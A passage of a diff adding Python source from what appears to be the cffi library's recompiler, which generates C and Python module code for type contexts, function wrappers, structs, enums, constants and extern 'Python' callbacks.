included_module_name, included_source = ( + ffi_to_include._assigned_source[:2]) + except AttributeError: + raise VerificationError( + "ffi object %r includes %r, but the latter has not " + "been prepared with set_source()" % ( + self.ffi, ffi_to_include,)) + if included_source is None: + raise VerificationError( + "not implemented yet: ffi.include() of a Python-based " + "ffi inside a C-based ffi") + prnt(' "%s",' % (included_module_name,)) + prnt(' NULL') + prnt('};') + prnt() + # + # the declaration of '_cffi_type_context' + prnt('static const struct _cffi_type_context_s _cffi_type_context = {') + prnt(' _cffi_types,') + for step_name in self.ALL_STEPS: + if nums[step_name] > 0: + prnt(' _cffi_%ss,' % step_name) + else: + prnt(' NULL, /* no %ss */' % step_name) + for step_name in self.ALL_STEPS: + if step_name != "field": + prnt(' %d, /* num_%ss */' % (nums[step_name], step_name)) + if self.ffi._included_ffis: + prnt(' _cffi_includes,') + else: + prnt(' NULL, /* no includes */') + prnt(' %d, /* num_types */' % (len(self.cffi_types),)) + flags = 0 + if self._num_externpy > 0 or self.ffi._embedding is not None: + flags |= 1 # set to mean that we use extern "Python" + prnt(' %d, /* flags */' % flags) + prnt('};') + prnt() + # + # the init function + prnt('#ifdef __GNUC__') + prnt('# pragma GCC visibility push(default) /* for -fvisibility= */') + prnt('#endif') + prnt() + prnt('#ifdef PYPY_VERSION') + prnt('PyMODINIT_FUNC') + prnt('_cffi_pypyinit_%s(const void *p[])' % (base_module_name,)) + prnt('{') + if flags & 1: + prnt(' if (((intptr_t)p[0]) >= 0x0A03) {') + prnt(' _cffi_call_python_org = ' + '(void(*)(struct _cffi_externpy_s *, char *))p[1];') + prnt(' }') + prnt(' p[0] = (const void *)0x%x;' % self._version) + prnt(' p[1] = &_cffi_type_context;') + prnt('#if PY_MAJOR_VERSION >= 3') + prnt(' return NULL;') + prnt('#endif') + prnt('}') + # on Windows, distutils insists on putting init_cffi_xyz in + # 'export_symbols', so instead of fighting it, just give up and + # give it one + prnt('# ifdef _MSC_VER') + prnt(' PyMODINIT_FUNC') + prnt('# if PY_MAJOR_VERSION >= 3') + prnt(' PyInit_%s(void) { return NULL; }' % (base_module_name,)) + prnt('# else') + prnt(' init%s(void) { }' % (base_module_name,)) + prnt('# endif') + prnt('# endif') + prnt('#elif PY_MAJOR_VERSION >= 3') + prnt('PyMODINIT_FUNC') + prnt('PyInit_%s(void)' % (base_module_name,)) + prnt('{') + prnt(' return _cffi_init("%s", 0x%x, &_cffi_type_context);' % ( + self.module_name, self._version)) + prnt('}') + prnt('#else') + prnt('PyMODINIT_FUNC') + prnt('init%s(void)' % (base_module_name,)) + prnt('{') + prnt(' _cffi_init("%s", 0x%x, &_cffi_type_context);' % ( + self.module_name, self._version)) + prnt('}') + prnt('#endif') + prnt() + prnt('#ifdef __GNUC__') + prnt('# pragma GCC visibility pop') + prnt('#endif') + self._version = None + + def _to_py(self, x): + if isinstance(x, str): + return "b'%s'" % (x,) + if isinstance(x, (list, tuple)): + rep = [self._to_py(item) for item in x] + if len(rep) == 1: + rep.append('') + return "(%s)" % (','.join(rep),) + return x.as_python_expr() # Py2: unicode unexpected; Py3: bytes unexp. + + def write_py_source_to_f(self, f): + self._f = f + prnt = self._prnt + # + # header + prnt("# auto-generated file") + prnt("import _cffi_backend") + # + # the 'import' of the included ffis + num_includes = len(self.ffi._included_ffis or ()) + for i in range(num_includes): + ffi_to_include = self.ffi._included_ffis[i] + try: + included_module_name, included_source = ( + ffi_to_include._assigned_source[:2]) + except AttributeError: + raise VerificationError( + "ffi object %r includes %r, but the latter has not " + "been prepared with set_source()" % ( + self.ffi, ffi_to_include,)) + if included_source is not None: + raise VerificationError( + "not implemented yet: ffi.include() of a C-based " + "ffi inside a Python-based ffi") + prnt('from %s import ffi as _ffi%d' % (included_module_name, i)) + prnt() + prnt("ffi = _cffi_backend.FFI('%s'," % (self.module_name,)) + prnt(" _version = 0x%x," % (self._version,)) + self._version = None + # + # the '_types' keyword argument + self.cffi_types = tuple(self.cffi_types) # don't change any more + types_lst = [op.as_python_bytes() for op in self.cffi_types] + prnt(' _types = %s,' % (self._to_py(''.join(types_lst)),)) + typeindex2type = dict([(i, tp) for (tp, i) in self._typesdict.items()]) + # + # the keyword arguments from ALL_STEPS + for step_name in self.ALL_STEPS: + lst = self._lsts[step_name] + if len(lst) > 0 and step_name != "field": + prnt(' _%ss = %s,' % (step_name, self._to_py(lst))) + # + # the '_includes' keyword argument + if num_includes > 0: + prnt(' _includes = (%s,),' % ( + ', '.join(['_ffi%d' % i for i in range(num_includes)]),)) + # + # the footer + prnt(')') + + # ---------- + + def _gettypenum(self, type): + # a KeyError here is a bug. please report it! :-) + return self._typesdict[type] + + def _convert_funcarg_to_c(self, tp, fromvar, tovar, errcode): + extraarg = '' + if isinstance(tp, model.BasePrimitiveType) and not tp.is_complex_type(): + if tp.is_integer_type() and tp.name != '_Bool': + converter = '_cffi_to_c_int' + extraarg = ', %s' % tp.name + elif isinstance(tp, model.UnknownFloatType): + # don't check with is_float_type(): it may be a 'long + # double' here, and _cffi_to_c_double would loose precision + converter = '(%s)_cffi_to_c_double' % (tp.get_c_name(''),) + else: + cname = tp.get_c_name('') + converter = '(%s)_cffi_to_c_%s' % (cname, + tp.name.replace(' ', '_')) + if cname in ('char16_t', 'char32_t'): + self.needs_version(VERSION_CHAR16CHAR32) + errvalue = '-1' + # + elif isinstance(tp, model.PointerType): + self._convert_funcarg_to_c_ptr_or_array(tp, fromvar, + tovar, errcode) + return + # + elif (isinstance(tp, model.StructOrUnionOrEnum) or + isinstance(tp, model.BasePrimitiveType)): + # a struct (not a struct pointer) as a function argument; + # or, a complex (the same code works) + self._prnt(' if (_cffi_to_c((char *)&%s, _cffi_type(%d), %s) < 0)' + % (tovar, self._gettypenum(tp), fromvar)) + self._prnt(' %s;' % errcode) + return + # + elif isinstance(tp, model.FunctionPtrType): + converter = '(%s)_cffi_to_c_pointer' % tp.get_c_name('') + extraarg = ', _cffi_type(%d)' % self._gettypenum(tp) + errvalue = 'NULL' + # + else: + raise NotImplementedError(tp) + # + self._prnt(' %s = %s(%s%s);' % (tovar, converter, fromvar, extraarg)) + self._prnt(' if (%s == (%s)%s && PyErr_Occurred())' % ( + tovar, tp.get_c_name(''), errvalue)) + self._prnt(' %s;' % errcode) + + def _extra_local_variables(self, tp, localvars, freelines): + if isinstance(tp, model.PointerType): + localvars.add('Py_ssize_t datasize') + localvars.add('struct _cffi_freeme_s *large_args_free = NULL') + freelines.add('if (large_args_free != NULL)' + ' _cffi_free_array_arguments(large_args_free);') + + def _convert_funcarg_to_c_ptr_or_array(self, tp, fromvar, tovar, errcode): + self._prnt(' datasize = _cffi_prepare_pointer_call_argument(') + self._prnt(' _cffi_type(%d), %s, (char **)&%s);' % ( + self._gettypenum(tp), fromvar, tovar)) + self._prnt(' if (datasize != 0) {') + self._prnt(' %s = ((size_t)datasize) <= 640 ? ' + '(%s)alloca((size_t)datasize) : NULL;' % ( + tovar, tp.get_c_name(''))) + self._prnt(' if (_cffi_convert_array_argument(_cffi_type(%d), %s, ' + '(char **)&%s,' % (self._gettypenum(tp), fromvar, tovar)) + self._prnt(' datasize, &large_args_free) < 0)') + self._prnt(' %s;' % errcode) + self._prnt(' }') + + def _convert_expr_from_c(self, tp, var, context): + if isinstance(tp, model.BasePrimitiveType): + if tp.is_integer_type() and tp.name != '_Bool': + return '_cffi_from_c_int(%s, %s)' % (var, tp.name) + elif isinstance(tp, model.UnknownFloatType): + return '_cffi_from_c_double(%s)' % (var,) + elif tp.name != 'long double' and not tp.is_complex_type(): + cname = tp.name.replace(' ', '_') + if cname in ('char16_t', 'char32_t'): + self.needs_version(VERSION_CHAR16CHAR32) + return '_cffi_from_c_%s(%s)' % (cname, var) + else: + return '_cffi_from_c_deref((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, (model.PointerType, model.FunctionPtrType)): + return '_cffi_from_c_pointer((char *)%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, model.ArrayType): + return '_cffi_from_c_pointer((char *)%s, _cffi_type(%d))' % ( + var, self._gettypenum(model.PointerType(tp.item))) + elif isinstance(tp, model.StructOrUnion): + if tp.fldnames is None: + raise TypeError("'%s' is used as %s, but is opaque" % ( + tp._get_c_name(), context)) + return '_cffi_from_c_struct((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, model.EnumType): + return '_cffi_from_c_deref((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + else: + raise NotImplementedError(tp) + + # ---------- + # typedefs + + def _typedef_type(self, tp, name): + return self._global_type(tp, "(*(%s *)0)" % (name,)) + + def _generate_cpy_typedef_collecttype(self, tp, name): + self._do_collect_type(self._typedef_type(tp, name)) + + def _generate_cpy_typedef_decl(self, tp, name): + pass + + def _typedef_ctx(self, tp, name): + type_index = self._typesdict[tp] + self._lsts["typename"].append(TypenameExpr(name, type_index)) + + def _generate_cpy_typedef_ctx(self, tp, name): + tp = self._typedef_type(tp, name) + self._typedef_ctx(tp, name) + if getattr(tp, "origin", None) == "unknown_type": + self._struct_ctx(tp, tp.name, approxname=None) + elif isinstance(tp, model.NamedPointerType): + self._struct_ctx(tp.totype, tp.totype.name, approxname=tp.name, + named_ptr=tp) + + # ---------- + # function declarations + + def _generate_cpy_function_collecttype(self, tp, name): + self._do_collect_type(tp.as_raw_function()) + if tp.ellipsis and not self.target_is_python: + self._do_collect_type(tp) + + def _generate_cpy_function_decl(self, tp, name): + assert not self.target_is_python + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + # cannot support vararg functions better than this: check for its + # exact type (including the fixed arguments), and build it as a + # constant function pointer (no CPython wrapper) + self._generate_cpy_constant_decl(tp, name) + return + prnt = self._prnt + numargs = len(tp.args) + if numargs == 0: + argname = 'noarg' + elif numargs == 1: + argname = 'arg0' + else: + argname = 'args' + # + # ------------------------------ + # the 'd' version of the function, only for addressof(lib, 'func') + arguments = [] + call_arguments = [] + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + arguments.append(type.get_c_name(' x%d' % i, context)) + call_arguments.append('x%d' % i) + repr_arguments = ', '.join(arguments) + repr_arguments = repr_arguments or 'void' + if tp.abi: + abi = tp.abi + ' ' + else: + abi = '' + name_and_arguments = '%s_cffi_d_%s(%s)' % (abi, name, repr_arguments) + prnt('static %s' % (tp.result.get_c_name(name_and_arguments),)) + prnt('{') + call_arguments = ', '.join(call_arguments) + result_code = 'return ' + if isinstance(tp.result, model.VoidType): + result_code = '' + prnt(' %s%s(%s);' % (result_code, name, call_arguments)) + prnt('}') + # + prnt('#ifndef PYPY_VERSION') # ------------------------------ + # + prnt('static PyObject *') + prnt('_cffi_f_%s(PyObject *self, PyObject *%s)' % (name, argname)) + prnt('{') + # + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + arg = type.get_c_name(' x%d' % i, context) + prnt(' %s;' % arg) + # + localvars = set() + freelines = set() + for type in tp.args: + self._extra_local_variables(type, localvars, freelines) + for decl in sorted(localvars): + prnt(' %s;' % (decl,)) + # + if not isinstance(tp.result, model.VoidType): + result_code = 'result = ' + context = 'result of %s' % name + result_decl = ' %s;' % tp.result.get_c_name(' result', context) + prnt(result_decl) + prnt(' PyObject *pyresult;') + else: + result_decl = None + result_code = '' + # + if len(tp.args) > 1: + rng = range(len(tp.args)) + for i in rng: + prnt(' PyObject *arg%d;' % i) + prnt() + prnt(' if (!PyArg_UnpackTuple(args, "%s", %d, %d, %s))' % ( + name, len(rng), len(rng), + ', '.join(['&arg%d' % i for i in rng]))) + prnt(' return NULL;') + prnt() + # + for i, type in enumerate(tp.args): + self._convert_funcarg_to_c(type, 'arg%d' % i, 'x%d' % i, + 'return NULL') + prnt() + # + prnt(' Py_BEGIN_ALLOW_THREADS') + prnt(' _cffi_restore_errno();') + call_arguments = ['x%d' % i for i in range(len(tp.args))] + call_arguments = ', '.join(call_arguments) + prnt(' { %s%s(%s); }' % (result_code, name, call_arguments)) + prnt(' _cffi_save_errno();') + prnt(' Py_END_ALLOW_THREADS') + prnt() + # + prnt(' (void)self; /* unused */') + if numargs == 0: + prnt(' (void)noarg; /* unused */') + if result_code: + prnt(' pyresult = %s;' % + self._convert_expr_from_c(tp.result, 'result', 'result type')) + for freeline in freelines: + prnt(' ' + freeline) + prnt(' return pyresult;') + else: + for freeline in freelines: + prnt(' ' + freeline) + prnt(' Py_INCREF(Py_None);') + prnt(' return Py_None;') + prnt('}') + # + prnt('#else') # ------------------------------ + # + # the PyPy version: need to replace struct/union arguments with + # pointers, and if the result is a struct/union, insert a first + # arg that is a pointer to the result. We also do that for + # complex args and return type. + def need_indirection(type): + return (isinstance(type, model.StructOrUnion) or + (isinstance(type, model.PrimitiveType) and + type.is_complex_type())) + difference = False + arguments = [] + call_arguments = [] + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + indirection = '' + if need_indirection(type): + indirection = '*' + difference = True + arg = type.get_c_name(' %sx%d' % (indirection, i), context) + arguments.append(arg) + call_arguments.append('%sx%d' % (indirection, i)) + tp_result = tp.result + if need_indirection(tp_result): + context = 'result of %s' % name + arg = tp_result.get_c_name(' *result', context) + arguments.insert(0, arg) + tp_result = model.void_type + result_decl = None + result_code = '*result = ' + difference = True + if difference: + repr_arguments = ', '.join(arguments) + repr_arguments = repr_arguments or 'void' + name_and_arguments = '%s_cffi_f_%s(%s)' % (abi, name, + repr_arguments) + prnt('static %s' % (tp_result.get_c_name(name_and_arguments),)) + prnt('{') + if result_decl: + prnt(result_decl) + call_arguments = ', '.join(call_arguments) + prnt(' { %s%s(%s); }' % (result_code, name, call_arguments)) + if result_decl: + prnt(' return result;') + prnt('}') + else: + prnt('# define _cffi_f_%s _cffi_d_%s' % (name, name)) + # + prnt('#endif') # ------------------------------ + prnt() + + def _generate_cpy_function_ctx(self, tp, name): + if tp.ellipsis and not self.target_is_python: + self._generate_cpy_constant_ctx(tp, name) + return + type_index = self._typesdict[tp.as_raw_function()] + numargs = len(tp.args) + if self.target_is_python: + meth_kind = OP_DLOPEN_FUNC + elif numargs == 0: + meth_kind = OP_CPYTHON_BLTN_N # 'METH_NOARGS' + elif numargs == 1: + meth_kind = OP_CPYTHON_BLTN_O # 'METH_O' + else: + meth_kind = OP_CPYTHON_BLTN_V # 'METH_VARARGS' + self._lsts["global"].append( + GlobalExpr(name, '_cffi_f_%s' % name, + CffiOp(meth_kind, type_index), + size='_cffi_d_%s' % name)) + + # ---------- + # named structs or unions + + def _field_type(self, tp_struct, field_name, tp_field): + if isinstance(tp_field, model.ArrayType): + actual_length = tp_field.length + if actual_length == '...': + ptr_struct_name = tp_struct.get_c_name('*') + actual_length = '_cffi_array_len(((%s)0)->%s)' % ( + ptr_struct_name, field_name) + tp_item = self._field_type(tp_struct, '%s[0]' % field_name, + tp_field.item) + tp_field = model.ArrayType(tp_item, actual_length) + return tp_field + + def _struct_collecttype(self, tp): + self._do_collect_type(tp) + if self.target_is_python: + # also requires nested anon struct/unions in ABI mode, recursively + for fldtype in tp.anonymous_struct_fields(): + self._struct_collecttype(fldtype) + + def _struct_decl(self, tp, cname, approxname): + if tp.fldtypes is None: + return + prnt = self._prnt + checkfuncname = '_cffi_checkfld_%s' % (approxname,) + prnt('_CFFI_UNUSED_FN') + prnt('static void %s(%s *p)' % (checkfuncname, cname)) + prnt('{') + prnt(' /* only to generate compile-time warnings or errors */') + prnt(' (void)p;') + for fname, ftype, fbitsize, fqual in self._enum_fields(tp): + try: + if ftype.is_integer_type() or fbitsize >= 0: + # accept all integers, but complain on float or double + if fname != '': + prnt(" (void)((p->%s) | 0); /* check that '%s.%s' is " + "an integer */" % (fname, cname, fname)) + continue + # only accept exactly the type declared, except that '[]' + # is interpreted as a '*' and so will match any array length. + # (It would also match '*', but that's harder to detect...) + while (isinstance(ftype, model.ArrayType) + and (ftype.length is None or ftype.length == '...')): + ftype = ftype.item + fname = fname + '[0]' + prnt(' { %s = &p->%s; (void)tmp; }' % ( + ftype.get_c_name('*tmp', 'field %r'%fname, quals=fqual), + fname)) + except VerificationError as e: + prnt(' /* %s */' % str(e)) # cannot verify it, ignore + prnt('}') + prnt('struct _cffi_align_%s { char x; %s y; };' % (approxname, cname)) + prnt() + + def _struct_ctx(self, tp, cname, approxname, named_ptr=None): + type_index = self._typesdict[tp] + reason_for_not_expanding = None + flags = [] + if isinstance(tp, model.UnionType): + flags.append("_CFFI_F_UNION") + if tp.fldtypes is None: + flags.append("_CFFI_F_OPAQUE") + reason_for_not_expanding = "opaque" + if (tp not in self.ffi._parser._included_declarations and + (named_ptr is None or + named_ptr not in self.ffi._parser._included_declarations)): + if tp.fldtypes is None: + pass # opaque + elif tp.partial or any(tp.anonymous_struct_fields()): + pass # field layout obtained silently from the C compiler + else: + flags.append("_CFFI_F_CHECK_FIELDS") + if tp.packed: + if tp.packed > 1: + raise NotImplementedError( + "%r is declared with 'pack=%r'; only 0 or 1 are " + "supported in API mode (try to use \"...;\", which " + "does not require a 'pack' declaration)" % + (tp, tp.packed)) + flags.append("_CFFI_F_PACKED") + else: + flags.append("_CFFI_F_EXTERNAL") + reason_for_not_expanding = "external" + flags = '|'.join(flags) or '0' + c_fields = [] + if reason_for_not_expanding is None: + enumfields = list(self._enum_fields(tp)) + for fldname, fldtype, fbitsize, fqual in enumfields: + fldtype = self._field_type(tp, fldname, fldtype) + self._check_not_opaque(fldtype, + "field '%s.%s'" % (tp.name, fldname)) + # cname is None for _add_missing_struct_unions() only + op = OP_NOOP + if fbitsize >= 0: + op = OP_BITFIELD + size = '%d /* bits */' % fbitsize + elif cname is None or ( + isinstance(fldtype, model.ArrayType) and + fldtype.length is None): + size = '(size_t)-1' + else: + size = 'sizeof(((%s)0)->%s)' % ( + tp.get_c_name('*') if named_ptr is None + else named_ptr.name, + fldname) + if cname is None or fbitsize >= 0: + offset = '(size_t)-1' + elif named_ptr is not None: + offset = '((char *)&((%s)0)->%s) - (char *)0' % ( + named_ptr.name, fldname) + else: + offset = 'offsetof(%s, %s)' % (tp.get_c_name(''), fldname) + c_fields.append( + FieldExpr(fldname, offset, size, fbitsize, + CffiOp(op, self._typesdict[fldtype]))) + first_field_index = len(self._lsts["field"]) + self._lsts["field"].extend(c_fields) + # + if cname is None: # unknown name, for _add_missing_struct_unions + size = '(size_t)-2' + align = -2 + comment = "unnamed" + else: + if named_ptr is not None: + size = 'sizeof(*(%s)0)' % (named_ptr.name,) + align = '-1 /* unknown alignment */' + else: + size = 'sizeof(%s)' % (cname,) + align = 'offsetof(struct _cffi_align_%s, y)' % (approxname,) + comment = None + else: + size = '(size_t)-1' + align = -1 + first_field_index = -1 + comment = reason_for_not_expanding + self._lsts["struct_union"].append( + StructUnionExpr(tp.name, type_index, flags, size, align, comment, + first_field_index, c_fields)) + self._seen_struct_unions.add(tp) + + def _check_not_opaque(self, tp, location): + while isinstance(tp, model.ArrayType): + tp = tp.item + if isinstance(tp, model.StructOrUnion) and tp.fldtypes is None: + raise TypeError( + "%s is of an opaque type (not declared in cdef())" % location) + + def _add_missing_struct_unions(self): + # not very nice, but some struct declarations might be missing + # because they don't have any known C name. Check that they are + # not partial (we can't complete or verify them!) and emit them + # anonymously. + lst = list(self._struct_unions.items()) + lst.sort(key=lambda tp_order: tp_order[1]) + for tp, order in lst: + if tp not in self._seen_struct_unions: + if tp.partial: + raise NotImplementedError("internal inconsistency: %r is " + "partial but was not seen at " + "this point" % (tp,)) + if tp.name.startswith('$') and tp.name[1:].isdigit(): + approxname = tp.name[1:] + elif tp.name == '_IO_FILE' and tp.forcename == 'FILE': + approxname = 'FILE' + self._typedef_ctx(tp, 'FILE') + else: + raise NotImplementedError("internal inconsistency: %r" % + (tp,)) + self._struct_ctx(tp, None, approxname) + + def _generate_cpy_struct_collecttype(self, tp, name): + self._struct_collecttype(tp) + _generate_cpy_union_collecttype = _generate_cpy_struct_collecttype + + def _struct_names(self, tp): + cname = tp.get_c_name('') + if ' ' in cname: + return cname, cname.replace(' ', '_') + else: + return cname, '_' + cname + + def _generate_cpy_struct_decl(self, tp, name): + self._struct_decl(tp, *self._struct_names(tp)) + _generate_cpy_union_decl = _generate_cpy_struct_decl + + def _generate_cpy_struct_ctx(self, tp, name): + self._struct_ctx(tp, *self._struct_names(tp)) + _generate_cpy_union_ctx = _generate_cpy_struct_ctx + + # ---------- + # 'anonymous' declarations. These are produced for anonymous structs + # or unions; the 'name' is obtained by a typedef. + + def _generate_cpy_anonymous_collecttype(self, tp, name): + if isinstance(tp, model.EnumType): + self._generate_cpy_enum_collecttype(tp, name) + else: + self._struct_collecttype(tp) + + def _generate_cpy_anonymous_decl(self, tp, name): + if isinstance(tp, model.EnumType): + self._generate_cpy_enum_decl(tp) + else: + self._struct_decl(tp, name, 'typedef_' + name) + + def _generate_cpy_anonymous_ctx(self, tp, name): + if isinstance(tp, model.EnumType): + self._enum_ctx(tp, name) + else: + self._struct_ctx(tp, name, 'typedef_' + name) + + # ---------- + # constants, declared with "static const ..." + + def _generate_cpy_const(self, is_int, name, tp=None, category='const', + check_value=None): + if (category, name) in self._seen_constants: + raise VerificationError( + "duplicate declaration of %s '%s'" % (category, name)) + self._seen_constants.add((category, name)) + # + prnt = self._prnt + funcname = '_cffi_%s_%s' % (category, name) + if is_int: + prnt('static int %s(unsigned long long *o)' % funcname) + prnt('{') + prnt(' int n = (%s) <= 0;' % (name,)) + prnt(' *o = (unsigned long long)((%s) | 0);' + ' /* check that %s is an integer */' % (name, name)) + if check_value is not None: + if check_value > 0: + check_value = '%dU' % (check_value,) + prnt(' if (!_cffi_check_int(*o, n, %s))' % (check_value,)) + prnt(' n |= 2;') + prnt(' return n;') + prnt('}') + else: + assert check_value is None + prnt('static void %s(char *o)' % funcname) + prnt('{') + prnt(' *(%s)o = %s;' % (tp.get_c_name('*'), name)) + prnt('}') + prnt() + + def _generate_cpy_constant_collecttype(self, tp, name): + is_int = tp.is_integer_type() + if not is_int or self.target_is_python: + self._do_collect_type(tp) + + def _generate_cpy_constant_decl(self, tp, name): + is_int = tp.is_integer_type() + self._generate_cpy_const(is_int, name, tp) + + def _generate_cpy_constant_ctx(self, tp, name): + if not self.target_is_python and tp.is_integer_type(): + type_op = CffiOp(OP_CONSTANT_INT, -1) + else: + if self.target_is_python: + const_kind = OP_DLOPEN_CONST + else: + const_kind = OP_CONSTANT + type_index = self._typesdict[tp] + type_op = CffiOp(const_kind, type_index) + self._lsts["global"].append( + GlobalExpr(name, '_cffi_const_%s' % name, type_op)) + + # ---------- + # enums + + def _generate_cpy_enum_collecttype(self, tp, name): + self._do_collect_type(tp) + + def _generate_cpy_enum_decl(self, tp, name=None): + for enumerator in tp.enumerators: + self._generate_cpy_const(True, enumerator) + + def _enum_ctx(self, tp, cname): + type_index = self._typesdict[tp] + type_op = CffiOp(OP_ENUM, -1) + if self.target_is_python: + tp.check_not_partial() + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + self._lsts["global"].append( + GlobalExpr(enumerator, '_cffi_const_%s' % enumerator, type_op, + check_value=enumvalue)) + # + if cname is not None and '$' not in cname and not self.target_is_python: + size = "sizeof(%s)" % cname + signed = "((%s)-1) <= 0" % cname + else: + basetp = tp.build_baseinttype(self.ffi, []) + size = self.ffi.sizeof(basetp) + signed = int(int(self.ffi.cast(basetp, -1)) < 0) + allenums = ",".join(tp.enumerators) + self._lsts["enum"].append( + EnumExpr(tp.name, type_index, size, signed, allenums)) + + def _generate_cpy_enum_ctx(self, tp, name): + self._enum_ctx(tp, tp._get_c_name()) + + # ---------- + # macros: for now only for integers + + def _generate_cpy_macro_collecttype(self, tp, name): + pass + + def _generate_cpy_macro_decl(self, tp, name): + if tp == '...': + check_value = None + else: + check_value = tp # an integer + self._generate_cpy_const(True, name, check_value=check_value) + + def _generate_cpy_macro_ctx(self, tp, name): + if tp == '...': + if self.target_is_python: + raise VerificationError( + "cannot use the syntax '...' in '#define %s ...' when " + "using the ABI mode" % (name,)) + check_value = None + else: + check_value = tp # an integer + type_op = CffiOp(OP_CONSTANT_INT, -1) + self._lsts["global"].append( + GlobalExpr(name, '_cffi_const_%s' % name, type_op, + check_value=check_value)) + + # ---------- + # global variables + + def _global_type(self, tp, global_name): + if isinstance(tp, model.ArrayType): + actual_length = tp.length + if actual_length == '...': + actual_length = '_cffi_array_len(%s)' % (global_name,) + tp_item = self._global_type(tp.item, '%s[0]' % global_name) + tp = model.ArrayType(tp_item, actual_length) + return tp + + def _generate_cpy_variable_collecttype(self, tp, name): + self._do_collect_type(self._global_type(tp, name)) + + def _generate_cpy_variable_decl(self, tp, name): + prnt = self._prnt + tp = self._global_type(tp, name) + if isinstance(tp, model.ArrayType) and tp.length is None: + tp = tp.item + ampersand = '' + else: + ampersand = '&' + # This code assumes that casts from "tp *" to "void *" is a + # no-op, i.e. a function that returns a "tp *" can be called + # as if it returned a "void *". This should be generally true + # on any modern machine. The only exception to that rule (on + # uncommon architectures, and as far as I can tell) might be + # if 'tp' were a function type, but that is not possible here. + # (If 'tp' is a function _pointer_ type, then casts from "fn_t + # **" to "void *" are again no-ops, as far as I can tell.) + decl = '*_cffi_var_%s(void)' % (name,) + prnt('static ' + tp.get_c_name(decl, quals=self._current_quals)) + prnt('{') + prnt(' return %s(%s);' % (ampersand, name)) + prnt('}') + prnt() + + def _generate_cpy_variable_ctx(self, tp, name): + tp = self._global_type(tp, name) + type_index = self._typesdict[tp] + if self.target_is_python: + op = OP_GLOBAL_VAR + else: + op = OP_GLOBAL_VAR_F + self._lsts["global"].append( + GlobalExpr(name, '_cffi_var_%s' % name, CffiOp(op, type_index))) + + # ---------- + # extern "Python" + + def _generate_cpy_extern_python_collecttype(self, tp, name): + assert isinstance(tp, model.FunctionPtrType) + self._do_collect_type(tp) + _generate_cpy_dllexport_python_collecttype = \ + _generate_cpy_extern_python_plus_c_collecttype = \ + _generate_cpy_extern_python_collecttype + + def _extern_python_decl(self, tp, name, tag_and_space): + prnt = self._prnt + if isinstance(tp.result, model.VoidType): + size_of_result = '0' + else: + context = 'result of %s' % name + size_of_result = '(int)sizeof(%s)' % ( + tp.result.get_c_name('', context),) + prnt('static struct _cffi_externpy_s _cffi_externpy__%s =' % name) + prnt(' { "%s.%s", %s, 0, 0 };' % ( + self.module_name, name, size_of_result)) + prnt() + # + arguments = [] + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + arg = type.get_c_name(' a%d' % i, context) + arguments.append(arg) + # + repr_arguments = ', '.join(arguments) + repr_arguments = repr_arguments or 'void' + name_and_arguments = '%s(%s)' % (name, repr_arguments) + if tp.abi == "__stdcall": + name_and_arguments = '_cffi_stdcall ' + name_and_arguments + # + def may_need_128_bits(tp): + return (isinstance(tp, model.PrimitiveType) and + tp.name == 'long double') + # + size_of_a = max(len(tp.args)*8, 8) + if may_need_128_bits(tp.result): + size_of_a = max(size_of_a, 16) + if isinstance(tp.result, model.StructOrUnion): + size_of_a = 'sizeof(%s) > %d ? sizeof(%s) : %d' % ( + tp.result.get_c_name(''), size_of_a, + tp.result.get_c_name(''), size_of_a) + prnt('%s%s' % (tag_and_space, tp.result.get_c_name(name_and_arguments))) + prnt('{') + prnt(' char a[%s];' % size_of_a) + prnt(' char *p = a;') + for i, type in enumerate(tp.args): + arg = 'a%d' % i + if (isinstance(type, model.StructOrUnion) or + may_need_128_bits(type)): + arg = '&' + arg + type = model.PointerType(type) + prnt(' *(%s)(p + %d) = %s;' % (type.get_c_name('*'), i*8, arg)) + prnt(' _cffi_call_python(&_cffi_externpy__%s, p);' % name) + if not isinstance(tp.result, model.VoidType): + prnt(' return *(%s)p;' % (tp.result.get_c_name('*'),)) + prnt('}') + prnt() + self._num_externpy += 1 + + def _generate_cpy_extern_python_decl(self, tp, name): + self._extern_python_decl(tp, name, 'static ') + + def _generate_cpy_dllexport_python_decl(self, tp, name): + self._extern_python_decl(tp, name, 'CFFI_DLLEXPORT ') + + def _generate_cpy_extern_python_plus_c_decl(self, tp, name): + self._extern_python_decl(tp, name, '') + + def _generate_cpy_extern_python_ctx(self, tp, name): + if self.target_is_python: + raise VerificationError( + "cannot use 'extern \"Python\"' in the ABI mode") + if tp.ellipsis: + raise NotImplementedError("a vararg function is extern \"Python\"") + type_index = self._typesdict[tp] + type_op = CffiOp(OP_EXTERN_PYTHON, type_index) + self._lsts["global"].append( + GlobalExpr(name, '&_cffi_externpy__%s' % name, type_op, name)) + + _generate_cpy_dllexport_python_ctx = \ + _generate_cpy_extern_python_plus_c_ctx = \ + _generate_cpy_extern_python_ctx + + def _print_string_literal_in_array(self, s): + prnt = self._prnt + prnt('// # NB. this is not a string because of a size limit in MSVC') + if not isinstance(s, bytes): # unicode + s = s.encode('utf-8') # -> bytes + else: + s.decode('utf-8') # got bytes, check for valid utf-8 + try: + s.decode('ascii') + except UnicodeDecodeError: + s = b'# -*- encoding: utf8 -*-\n' + s + for line in s.splitlines(True): + comment = line + if type('//') is bytes: # python2 + line = map(ord, line) # make a list of integers + else: # python3 + # type(line) is bytes, which enumerates like a list of integers + comment = ascii(comment)[1:-1] + prnt(('// ' + comment).rstrip()) + printed_line = '' + for c in line: + if len(printed_line) >= 76: + prnt(printed_line) + printed_line = '' + printed_line += '%d,' % (c,) + prnt(printed_line) + + # ---------- + # emitting the opcodes for individual types + + def _emit_bytecode_VoidType(self, tp, index): + self.cffi_types[index] = CffiOp(OP_PRIMITIVE, PRIM_VOID) + + def _emit_bytecode_PrimitiveType(self, tp, index): + prim_index = PRIMITIVE_TO_INDEX[tp.name] + self.cffi_types[index] = CffiOp(OP_PRIMITIVE, prim_index) + + def _emit_bytecode_UnknownIntegerType(self, tp, index): + s = ('_cffi_prim_int(sizeof(%s), (\n' + ' ((%s)-1) | 0 /* 